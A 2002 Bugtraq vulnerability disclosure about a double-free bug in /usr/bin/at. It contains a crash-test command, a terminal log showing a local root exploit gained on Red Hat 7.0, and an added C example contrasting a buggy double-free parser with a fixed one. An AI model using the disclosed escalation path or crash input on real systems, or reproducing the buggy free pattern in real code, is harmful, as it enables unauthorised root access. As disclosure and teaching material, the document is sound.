Bugtraq mailing list archives

'/usr/bin/at 31337 + vuln' problem + exploit


From: zen-parse <zen-parse () gmx net>
Date: Thu, 17 Jan 2002 13:19:08 +1300 (NZDT)

Affects: /usr/bin/at 

To check if you are potentially vulnerable to this exploit, execute:
  /usr/bin/at 31337 + vuln

If you are vulnerable this will cause:
Segmentation fault 

If not, there will be a message similar to: 
Garbled time
(possibly with some extra information)

The problem is caused by a bug in the parser which deallocates the same 
memory location twice.

This can sometimes be exploited for the uid of "daemon", and due to some 
other minor problems may allow root access from there.

Attached is an exploit for Redhat 7.0.

bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3 
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$ 

-- zen-parse

-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse () gmx net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.


Attachment: attn.tar.gz
Description: Local root exploit (rh 7.0)
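The bug class the post describes (a parser that deallocates the same memory location twice), shown as an added illustration that is not part of zen-parse's message and is not the at(1) source: a toy time-spec parser with the same shape of defect, an error path that releases the token buffer and then a shared cleanup that releases it again, beside a fixed version with a single release point. The grammar, the function names (parse_spec_buggy, parse_spec_fixed, tracked_free) and the tracking wrapper are all assumptions made for this example; free() is routed through the tracker so the repeat release is counted instead of being handed to the allocator, which would be undefined behaviour and is exactly what the real exploit builds on.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Constructed example: a toy "HHMM [+ N unit]" parser, NOT the at(1) code.
 * Allocations are recorded so a second release of the same block is counted
 * rather than passed to free() again. */

#define MAX_BLOCKS 16
static void *blocks[MAX_BLOCKS];
static int   block_freed[MAX_BLOCKS];
static int   nblocks;
static int   double_frees;

/* Release everything for real and clear the counters between parses. */
static void reset_tracking(void) {
    for (int i = 0; i < nblocks; i++) free(blocks[i]);
    nblocks = 0;
    double_frees = 0;
}

static int double_free_count(void) { return double_frees; }

static char *tracked_strdup(const char *s) {
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (!p || nblocks == MAX_BLOCKS) { free(p); return NULL; }
    memcpy(p, s, n);
    blocks[nblocks] = p;
    block_freed[nblocks] = 0;
    nblocks++;
    return p;
}

/* Stand-in for free(): a repeat release of a live block is the bug. */
static void tracked_free(void *p) {
    if (!p) return;
    for (int i = 0; i < nblocks; i++) {
        if (blocks[i] == p) {
            if (block_freed[i]) double_frees++;
            block_freed[i] = 1;
            return;
        }
    }
}

/* "HHMM" (3 or 4 digits) -> minutes after midnight, -1 if garbled. */
static int parse_time(const char *tok) {
    size_t n = strlen(tok);
    if (n < 3 || n > 4) return -1;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)tok[i])) return -1;
    int v = atoi(tok), hh = v / 100, mm = v % 100;
    return (hh > 23 || mm > 59) ? -1 : hh * 60 + mm;
}

/* "N unit" -> minutes, -1 if garbled. */
static int parse_increment(const char *num, const char *unit) {
    char *end;
    long n = strtol(num, &end, 10);
    if (*num == '\0' || *end != '\0' || n < 0) return -1;
    if (!strncmp(unit, "minute", 6)) return (int)n;
    if (!strncmp(unit, "hour", 4))   return (int)(n * 60);
    if (!strncmp(unit, "day", 3))    return (int)(n * 1440);
    return -1;
}

/* Buggy shape: each error path frees buf, then jumps to a cleanup that
 * frees it again. Returns -1 for a garbled spec. */
static int parse_spec_buggy(const char *spec) {
    char *buf = tracked_strdup(spec);
    if (!buf) return -1;
    int result;
    char *tok = strtok(buf, " ");
    int base = tok ? parse_time(tok) : -1;
    if (base < 0) { tracked_free(buf); goto garbled; }      /* release #1 */
    result = base;
    tok = strtok(NULL, " ");
    if (tok) {
        char *num = strtok(NULL, " "), *unit = strtok(NULL, " ");
        int inc = (!strcmp(tok, "+") && num && unit) ? parse_increment(num, unit) : -1;
        if (inc < 0) { tracked_free(buf); goto garbled; }   /* release #1 */
        result = (base + inc) % 1440;
    }
    tracked_free(buf);
    return result;
garbled:
    tracked_free(buf);                                      /* release #2: double free */
    return -1;
}

/* Fixed shape: one owner, one release point, pointer cleared afterwards. */
static int parse_spec_fixed(const char *spec) {
    char *buf = tracked_strdup(spec);
    if (!buf) return -1;
    int result = -1;
    char *tok = strtok(buf, " ");
    int base = tok ? parse_time(tok) : -1;
    if (base >= 0) {
        result = base;
        tok = strtok(NULL, " ");
        if (tok) {
            char *num = strtok(NULL, " "), *unit = strtok(NULL, " ");
            int inc = (!strcmp(tok, "+") && num && unit) ? parse_increment(num, unit) : -1;
            result = inc < 0 ? -1 : (base + inc) % 1440;
        }
    }
    tracked_free(buf);
    buf = NULL;   /* any later stray free(NULL) is a no-op */
    return result;
}

int main(void) {
    reset_tracking();
    printf("buggy \"31337 + vuln\": %d, double frees: %d\n",
           parse_spec_buggy("31337 + vuln"), double_free_count());
    reset_tracking();
    printf("fixed \"31337 + vuln\": %d, double frees: %d\n",
           parse_spec_fixed("31337 + vuln"), double_free_count());
    reset_tracking();
    return 0;
}
```

With a real free() in place of the tracker, the second release is what the exploit turns into code execution on the glibc 2.2.4 of the post; current glibc builds usually abort with "double free or corruption" instead, but the defect is the same. Compiling the buggy shape with -fsanitize=address and running it on the post's "31337 + vuln" input reports the double free directly. The fix is ownership with a single release point, plus clearing the pointer after free() so a stray later free() sees NULL.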

